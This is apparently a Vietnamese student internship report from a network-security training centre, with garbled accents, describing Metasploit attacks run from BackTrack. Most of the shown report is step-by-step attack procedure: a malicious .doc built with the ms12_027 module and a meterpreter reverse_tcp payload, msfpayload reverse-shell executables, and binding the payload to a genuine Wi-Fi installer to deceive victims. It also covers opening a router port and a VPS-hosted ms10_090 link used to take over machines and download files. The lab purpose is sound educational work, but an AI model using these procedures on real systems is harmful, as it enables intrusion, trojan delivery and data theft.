Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
